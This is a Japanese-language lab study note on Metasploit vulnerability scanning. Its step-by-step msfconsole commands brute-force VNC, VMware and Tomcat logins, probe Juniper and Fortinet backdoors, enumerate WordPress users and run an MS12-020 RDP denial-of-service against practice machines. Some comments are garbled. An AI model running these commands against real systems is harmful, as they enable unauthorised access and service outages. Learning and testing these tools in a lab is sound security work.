Kali linux学習ノート(九十五)metasploit framework-弱点スキャン2020.4.27

12524 ワード

前言


本節学習用msf弱点スキャン
  • 情報収集結果に基づいて脆弱性利用モジュール
  • を検索する.
  • 外部脆弱性スキャンシステムと組み合わせて大量のIPアドレスセグメントを一括スキャン
  • する.
  • 誤審と漏審があるに違いない.
  • を検証することができる.

    1、準備


    ターゲットマシンmetasploitable


    IP:192.168.1.120
    netstat -pantu |grep 5900 #  vnc    

    ターゲットwinxp


    リモートデスクトップはファイアウォールを開けてIPを消します:192.168.1.1122

    ターゲットwin 7


    リモートデスクトップはファイアウォールを開けてIPを消します:192.168.1.1.23

    攻撃機カリ


    IP:192.168.1.121
    service postgresql start
    netstat -pantu | grep 5432 #      
    msfconsole

    2、vncパスワード解読

    msf > use auxiliary/scanner/vnc/vnc_login
    msf auxiliary(scanner/vnc/vnc_login) > show options
    msf auxiliary(scanner/vnc/vnc_login) > set BLANK_PASSWORDS true
    msf auxiliary(scanner/vnc/vnc_login) > set THREADS 20 #   
    msf auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/vnc/vnc_login) > run
    #           ,    

    3、VNC無パスワードアクセス(パスワードが設定されていない)


    これはサーバーの構成に問題があるので、試してみてください.
    msf > use auxiliary/scanner/vnc/vnc_none_auth
    msf auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/vnc/vnc_none_auth) > run
    #            ,  1    

    4、RDPリモートデスクトップの脆弱性


    非常に有名な脆弱性ms 12_020
    msf > use auxiliary/scanner/rdp/ms12_020_check #       DoS   
    msf auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 192.168.1.122 192.168.1.123
    msf auxiliary(scanner/rdp/ms12_020_check) > run
    #        ,    
    msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #     DoS  
    msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.122
    msf auxiliary(ms12_020_maxchannelids) > run
    #xp    
    msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.123
    msf auxiliary(ms12_020_maxchannelids) > run
    #win7    

    5、設備裏口

    msf > use auxiliary/scanner/ssh/juniper_backdoor #juniper    ,    rhost
    msf > use auxiliary/scanner/ssh/fortinet_backdoor #fortinet    ,    rhost

    6、VMware

    #      
    msf > use auxiliary/scanner/vmware/vmauthd_login
    msf auxiliary(vmauthd_login) > set BLANK_PASSWORDS true
    msf auxiliary(vmauthd_login) > set RHOSTS 192.168.1.0/24
    msf auxiliary(vmauthd_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/vmworks_common_20.txt
    msf auxiliary(vmauthd_login) > set USERNAME root
    msf auxiliary(vmauthd_login) > run
    #            
    msf > use auxiliary/scanner/vmware/vmware_enum_vms
    #             
    #   WEB API        
    msf > use auxiliary/admin/vmware/poweron_vm

    7、HTTP弱点スキャン

    #    
    msf > use auxiliary/scanner/http/cert
    msf auxiliary(scanner/http/cert) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/http/cert) > set THREADS 20
    msf auxiliary(scanner/http/cert) > run
    #       
    msf > use auxiliary/scanner/http/dir_listing
    msf auxiliary(scanner/http/dir_listing) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/http/dir_listing) > set PATH dav
    msf auxiliary(scanner/http/dir_listing) > run
    msf auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/files_dir
    msf auxiliary(scanner/http/files_dir) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/http/files_dir) > run
    #WebDAV Unicode         
    msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
    msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set THREADS 20
    msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > run
    #Tomcat       
    msf > use auxiliary/scanner/http/tomcat_mgr_login
    msf auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/http/tomcat_mgr_login) > run
    #   HTTP          
    msf > use auxiliary/scanner/http/verb_auth_bypass
    msf auxiliary(scanner/http/verb_auth_bypass) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/http/verb_auth_bypass) > run
    #Wordpress     
    msf > use auxiliary/scanner/http/wordpress_login_enum
    msf auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.1.120
    msf auxiliary(scanner/http/wordpress_login_enum) > run

    8、WMAP WEB応用スキャナー


    sqlmapの働き方に基づいて開発されたプラグインwmap
    msf > load wmap
    msf > wmap_sites -h
    msf > wmap_sites -a http://192.168.1.120
    msf > wmap_targets -t http://192.168.1.120/mutillidae/index.php
    msf > wmap_run -h
    msf > wmap_run -t #      
    msf > wmap_run -e #    
    msf > wmap_vulns -l #        
    msf > vulns

    9、openvas


    コマンドラインモードは、構成が必要で、使用が面倒であるため、webインタフェース127.0.0.1/9392を使用してスキャンした後にndeフォーマットレポート1を生成する.nbe msfはnbeスキャンログ1をインポートする.nbe
    msf > load openvas 
    msf > openvas_help
    msf > db_import 1.nbe
    msf > vulns 

    10、MSFは直接nessusを呼び出してスキャンを実行する


    直接接続nessus
    msf > load nessus
    msf > nessus_help
    msf > nessus_connect admin:[email protected]
    msf > nessus_policy_list
    msf > nessus_scan_new
    msf > nessus_report_list

    締めくくり


    msf弱点スキャンの手段は豊富で、サードパーティ製プラグインがたくさんあります.